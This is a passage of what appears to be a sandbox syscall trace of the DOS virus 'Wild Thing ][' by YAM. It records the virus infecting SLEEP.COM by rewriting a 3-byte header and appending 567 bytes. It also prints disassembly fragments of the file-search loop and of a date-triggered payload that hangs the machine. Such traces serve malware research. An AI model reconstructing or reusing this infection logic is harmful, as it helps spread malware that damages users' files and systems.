2018-12-25T12:42:09.330766521Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.33902692Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.341231113Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.35068315Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.360261558Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.364506054Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.370252341Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.380033472Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.392646132Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.394314453Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.400780369Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.403048416Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.405997869Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.40788757Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.417230312Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.418877427Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.426457827Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.437047867Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.43974232Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.445242415Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.455692346Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.463311978Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.464671624Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.471901156Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.47357281Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.476527278Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.478958473Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.488340677Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.489940159Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.498952188Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.508800054Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.511460827Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.519364269Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.539685864Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.546111424Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.547339868Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.553956601Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.555214213Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.557677771Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.559618662Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.56904113Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.570548085Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.578744407Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.59072295Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.593256448Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.599575449Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.609167623Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.615558743Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.617599979Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.624386186Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.625775707Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.633032925Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.644838264Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.647000642Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:09.65669107Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:09.658364813Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:09.659374385Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:09.669618698Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:09.179695499Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:09.181214078Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:09.183235173Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:09.185946195Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:09.188501035Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:09.194170053Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:09.199715347Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:09.205693464Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:09.223306353Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:09.234693641Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:09.236265222Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:09.242554373Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:09.243765812Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:09.24618505Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.248549192Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:09.256470916Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:09.257682331Z 62 PC: 12bfc | Close file
2018-12-25T12:42:09.26572995Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:09.275292893Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.277799179Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.283783857Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.293732591Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.301204354Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.30416836Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.310684945Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.312277012Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.316377165Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.31833487Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.33228408Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.334378623Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.350923974Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.361190564Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.365198466Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.371526131Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.381045184Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.387839579Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.389225071Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.395422553Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.396702474Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.399612048Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.401131288Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.409172997Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.411305432Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.419079733Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.428903679Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.432778707Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.439612023Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.449246617Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.456348745Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.457704827Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.463907921Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.465792709Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.468403942Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.470016617Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.478927076Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.480546566Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.488316503Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.498624615Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.501908289Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.50740326Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.517920036Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.524420542Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.525767229Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.533662213Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.535409746Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.538419882Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.541118943Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.549687444Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.551474865Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.559332272Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.570307334Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.573146208Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.579240717Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.589388079Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.596210063Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.597884653Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.605149225Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.606437717Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.609000483Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.611702016Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.620255747Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.621682998Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.629913178Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.642936116Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.645669079Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.65237463Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.661727049Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.669418092Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.671876646Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.678540404Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.680313925Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.683959572Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.685891335Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.694223316Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.696734499Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.704935958Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.714895817Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.718533953Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.724513089Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.734329012Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.741323623Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.743893914Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.750422196Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.75222011Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.76255853Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.775115118Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.777775149Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:09.782868331Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:09.784643904Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:09.785692167Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:09.794957792Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:09.579225979Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:09.58122187Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:09.583378437Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:09.586171583Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:09.599738497Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:09.605792288Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:09.616593545Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:09.628112259Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:09.643612251Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:09.650367808Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:09.652785783Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:09.659333047Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:09.660960141Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:09.66407714Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.665948531Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:09.674303479Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:09.675940748Z 62 PC: 12bfc | Close file
2018-12-25T12:42:09.684158299Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:09.694044049Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.696911052Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.709041255Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.718771398Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.725441418Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.72777301Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.734321922Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.735963286Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.739666712Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.742276148Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.750982703Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.753208504Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.760945555Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.770654753Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.775851155Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.781349724Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.790883725Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.797726009Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.799270984Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.80548602Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.806935083Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.810054622Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.811728215Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.819849717Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.822207707Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.829984875Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.840774549Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.84456011Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.850046769Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.859570186Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.867723678Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.874929628Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.88143939Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.883667906Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.886162452Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.887558513Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.896190573Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.89765728Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.905103394Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.915592768Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.918114378Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.923561117Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:09.933751572Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:09.940108007Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:09.941410698Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:09.948278424Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.94990071Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:09.952326534Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:09.953973061Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:09.962363719Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:09.963918019Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:09.971971248Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:09.984984695Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:09.987451081Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:09.992873473Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.00326211Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.009910425Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.011270777Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.018417611Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.019741574Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.022246394Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.025202919Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.034113501Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.035834215Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.044443151Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.054420138Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.056908043Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.063119964Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.072784746Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.077405074Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.079064496Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.083066158Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.084371427Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.086727048Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.087941044Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:10.106609262Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.109133097Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.117185234Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.126960871Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.129888264Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.135899517Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.14563472Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.152617566Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.155216592Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.161745155Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:10.163489351Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:10.174694867Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:10.184340113Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.186601705Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:10.191489022Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:10.193465646Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:10.194777385Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:10.203480749Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:10.377206753Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:10.379205754Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:10.382641423Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:10.38627404Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:10.396115441Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:10.404330454Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:10.411032574Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:10.417470537Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:10.443924097Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:10.471103868Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:10.473217661Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:10.482464685Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:10.484334428Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:10.487685915Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.489977171Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:10.500305968Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:10.502263434Z 62 PC: 12bfc | Close file
2018-12-25T12:42:10.510976555Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:10.523630846Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:10.534058859Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:10.551402819Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:10.564017227Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:10.571970731Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:10.574767443Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:10.593487342Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.595843165Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:10.59988721Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:10.602582105Z 64 PC: 12d36 | Write file or device (See above)
